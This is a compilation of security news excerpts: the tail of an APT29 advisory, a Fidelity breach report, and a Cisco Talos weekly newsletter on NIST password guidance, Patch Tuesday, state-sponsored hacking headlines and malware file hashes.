Some of the significant security vulnerabilities highlighted include CVE-2022-27924, a command injection flaw in Zimbra Collaboration, and CVE-2023-42793, a critical authentication bypass bug that allows for remote code execution on TeamCity Server.

APT29 is a relevant example of threat actors continuously innovating their tactics, techniques and procedures in an attempt to stay stealthy and circumvent defenses, even going to the extent of destroying their infrastructure and erasing any evidence should it suspect their intrusions have been detected, either by the victim or law enforcement.

Another notable technique is the extensive use of proxy networks, comprising mobile telephone providers or residential internet services, to interact with victims located in North America and blend in with legitimate traffic.

"To disrupt this activity, organizations should baseline authorized devices and apply additional scrutiny to systems accessing their network resources that do not adhere to the baseline," the agencies said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

CISA Warns of Threat Actors Exploiting F5 BIG-IP Cookies for Network Reconnaissance

The third-party actor had access for two days, in the financial services company's second major breach of the year.

Source: Ryan McGinnis via Alamy Stock Photo

Just over 77,000 individuals will be receiving news from Fidelity Investments that their personal information has been compromised in a data security incident. 

The breach itself occurred between Aug. 17 and Aug. 19, when an unauthorized third-party gained access to two customer accounts and obtained private information. When the activity was detected on Aug. 19, access was terminated and an investigation began.

According to Fidelity's notification letter, the incident did not involve any access to Fidelity accounts and the information obtained by the threat actors "related to a small subset of our customers."

"While the attackers' specific motives remain unclear, it's likely that information gathering was a primary objective," said Sarah Jones, cyber threat intelligence research analyst at Critical Start, in an emailed statement to Dark Reading. "The 'beachhead' theory, where attackers establish a foothold to launch further attacks, is a common tactic in such incidents. Although Fidelity assures customers that their accounts and funds were not directly accessed, the breach raises concerns about the security of personal information, increasing the risk of identity theft, fraud, or other malicious activities."

Indeed, though Fidelity iterates that it is unaware of any misuse of its customers' personal information obtained in this breach, this is the second time this year that it has faced a data breach. In March, Fidelity notified roughly 30,000 individuals that their information had been compromised in a third-party breach involving service provider Infosys McCamish (IMS).

Fidelity is providing free credit monitoring and identity restoration services for those impacted by this breach through TransUnion Interactive for 24 months.

It also encourages individuals to remain vigilant and review their financial statements often, reporting any suspicious or fraudulent activity.

Fidelity Notifies 77K Customers of Data Breach

Rather than setting a regular cadence for changing passwords, users only need to change their passwords if there is evidence of a breach.

Thursday, October 10, 2024 14:00

Say goodbye to the days of using the “@” symbol to mean “a” in your password or replacing an “S” with a “$.” 

The U.S. National Institute of Standards and Technology (NIST) recently announced new guidelines for the ways website and organizations should handle password creation and management that will do away with many of the “common sense” things we’ve thought about passwords for years now.  

Here is a tl;dr version of what these proposed guidelines say: 

*   Passwords need to be at least eight characters long, and sites should have an additional recommendation to make them at least 15 characters long. 
*   Credential service providers (CSPs) should allow users to make their passwords as long as 64 characters. 
*   CSPs should allow ASCII and Unicode characters to be included in passwords. 
*   Rather than setting a regular cadence for changing passwords, users only need to change their passwords if there is evidence of a breach. 
*   There should not be requirements to implement a certain number of numbers or special characters into passwords. (Ex., “Password12345!”) 
*   Do away with knowledge-based authentication or security questions when selecting passwords. (Think: “What was the name of your college roommate?”) 

Now, we should make a few things here clear. Just because NIST is proposing these doesn’t mean anyone \*has\* to abide by them, these are merely guidelines that some of the larger tech companies in the U.S. can choose to adopt. And these are proposed rules for the time being, meaning the public and tech companies have time to weigh in on the matter before they are codified in any way. 

While these proposals may seem counterintuitive, it should make traditional text-based login credentials more manageable for users and admins. Studies have shown that requiring a mixture of special characters and numbers has led users to create easier-to-guess passwords like “$ummer2024!” or “P@ssword”.  

And policies that require users to change their passwords often have led them to create passwords that are neigh-impossible to remember, so users end up storing these passwords in easy-to-locate places near their computers, like on a physical piece of paper or saved to a .txt file on their desktop.  

The hope from NIST is that enforcing longer passwords will make it harder for adversaries to guess and less intimidating for users to manage their passwords. 

Of course, using a third-party password manager is usually the most secure option for anyone. But what NIST is proposing is still a step in the right direction, and if nothing else will make those of us who are more security-minded have a better time when creating a new account.  

**The one big thing **

The largest Microsoft Patch Tuesday since July includes two vulnerabilities that have been exploited in the wild and three other critical issues across the company’s range of hardware and software offerings. October’s monthly security update from Microsoft includes fixes for 117 CVEs, the most in a month since July’s updates covered 142 vulnerabilities. The two vulnerabilities that Microsoft reports have been actively exploited in the wild and are publicly known are both rated as only being of “moderate” severity.   

**Why do I care? **

CVE-2024-43572 is a remote code execution vulnerability in the Microsoft Management Console that could allow an attacker to execute arbitrary code on the targeted machine. Microsoft’s security update will prevent untrusted Microsoft Saved Console (MSC) files from being opened to protect users against adversaries trying to exploit this vulnerability. The other vulnerability that was exploited in the wild in this week’s security update is CVE-2024-43573, a platform spoofing vulnerability in Windows MSHTML. Platform spoofing vulnerabilities usually allow an adversary to gain unauthorized access to an environment by disguising themselves as a trusted source.   

**So now what? **

Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Cisco Security Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. The rules included in this release that protect against the exploitation of many of these vulnerabilities are 64083 - 64086, 64089, 64090, 64111 and 64112. There are also Snort 3 rules 301034 - 301036 and 301041. 

**Top security headlines of the week  **

**Chinese state-sponsored actors are suspected to have breached several U.S. telecommunications providers to spy on U.S. government phone calls.** AT&T, Verizon and Lumen may have all been victims of the alleged counter-spying operation from the newly named APT Salt Typhoon. The actor potentially accessed information from systems that the U.S. government uses for court-authorized network wiretapping requests, all in the name of trying to steal government secrets. Though it’s still unclear how long Salt Typhoon had access to these networks, it’s clear they at least spent a few months on these networks, commonly used to cooperate with lawful U.S. requests for communication data. The attackers may have also accessed large amounts of other generic internet traffic through this operation. A separate Chinese APT known as Volt Typhoon became a major topic of conversation earlier this year for allegedly trying to infiltrate networks at U.S. military bases and other critical infrastructure sites. (Wall Street Journal, Washington Post) 

**Microsoft and the U.S. Department of Justice announced they had deactivated more than 60 domains and other attacker infrastructure associated with the Russian state-sponsored ColdRiver group.** ColdRiver is believed to be connected to Russia’s Federal Security Bureau (FSB) and recently has targeted non-governmental organizations, think tanks, military officials and intelligence officials in Ukraine and NATO countries. "The Russian government ran this scheme to steal Americans' sensitive information, using seemingly legitimate email accounts to trick victims into revealing account credentials," U.S. Deputy Attorney General Lisa Monaco stated during the announcement of the disruption. ColdRiver (aka Callisto Group, Seaborgium and Star Blizzard) has been active since at least 2017. The U.S. State Department is now also offering up to a $10 million reward for any information that could help locate or identify any individual members of ColdRiver. (Security Magazine, Bleeping Computer) 

**With genetic testing company 23AndMe floundering, customers are left wondering what could happen to their personal information if the company goes bankrupt or goes out of business altogether.** 23AndMe, known for collecting DNA samples from customers and then providing them with a report about their ancestry, has lost millions of dollars in its valuation and stock price over the past few years.  However more than 15 million individuals have submitted their DNA to the company since it was founded in 2006, and privacy advocates are warning them to manually delete their data now before anything happens to the company. The company also has several data-sharing agreements with other private companies, which use 23AndMe data to conduct other studies and research. And because 23AndMe’s services do not fall under health care in the U.S., the company does not have to adhere to traditional HIPAA rules. Last year, the company was hit with a massive data breach that it said affected 6.9 million customer accounts, including 14,000 people who had their passwords stolen. U.S. law enforcement has also tried to access the company’s data in the past (requests that have been declined), and it is unclear if those requests would be allowed should the company no longer exist. (NPR, Business Insider) 

**Can’t get enough Talos? **

*   Cisco Talos: Advanced intelligence for global cyberthreats 
*   New MedusaLocker Ransomware Variant Deployed by Threat Actor 
*   MedusaLocker ransomware variant paired with ‘paid\_memes’ toolkit 
*   Vulnerability in popular PDF reader could lead to arbitrary code execution; Multiple issues in GNOME project 

**Upcoming events where you can find Talos**

**MITRE ATT&CKcon 5.0** **(Oct. 22 - 23)** 

_McLean, Virginia and Virtual_

Nicole Hoffman and James Nutland will provide a brief history of Akira ransomware and an overview of the Linux ransomware landscape. Then, morph into action as they take a technical deep dive into the latest Linux variant using the ATT&CK framework to uncover its techniques, tactics and procedures.

**it-sa Expo & Congress** **(Oct. 22 - 24)** 

_Nuremberg, Germany_

**White Hat Desert Con** **(Nov. 14)** 

_Doha, Qatar_

**misecCON** **(Nov. 22)** 

_Lansing, Michigan_

Terryn Valikodath from Cisco Talos Incident Response will explore the core of DFIR, where digital forensics becomes detective work and incident response turns into firefighting.

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** 47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca   
**MD5:** 71fea034b422e4a17ebb06022532fdde   
**Typical Filename:** VID001.exe   
**Claimed Product:** N/A   
**Detection Name:** RF.Talos.80 

**SHA 256:** 76491df69a26019139ac11117cd21bf5d0257a5ebd3d67837f558c8c9c3483d8   
**MD5:** b209df2951e29ab5eab4009579b10b8d  
**Typical Filename:** FileZilla\_3.67.1\_win64\_sponsored2-setup.exe   
**Claimed Product:** FileZilla   
**Detection Name:** W32.76491DF69A-95.SBX.TG

**SHA 256:** c20fbc33680d745ec5ff7022c282a6fe969c6e6c7d77b7cfac34e6c19367cf9a   
**MD5:** 3bc6d86fc4b3262137d8d33713ed6082   
**Typical Filename:** 8c556f0a.dll   
**Claimed Product:** N/A   
**Detection Name:** Gen:Variant.Lazy.605353 

**SHA 256:** f0d7a2bb0c5db162332418747ba4987027b8a746b24c919a24235ff3b70d25e3   
**MD5:** 0d849044612667362bc88780baa1c1b7   
**Typical Filename:** CryptX.dll   
**Claimed Product:** N/A    
**Detection Name:** Gen:Variant.Lazy.605353 

**SHA 256:** 331fdf5f1f5679a6f6bb0baee8518058aba8081ef8f96e57fa3b74291fcbb814   
**MD5:** f23b90fc9bc301baf3e399e189b6d2dc   
**Typical Filename:** B.dll   
**Claimed Product:** N/A     
**Detection Name:** Gen:Variant.Lazy.605353

Tag

#intel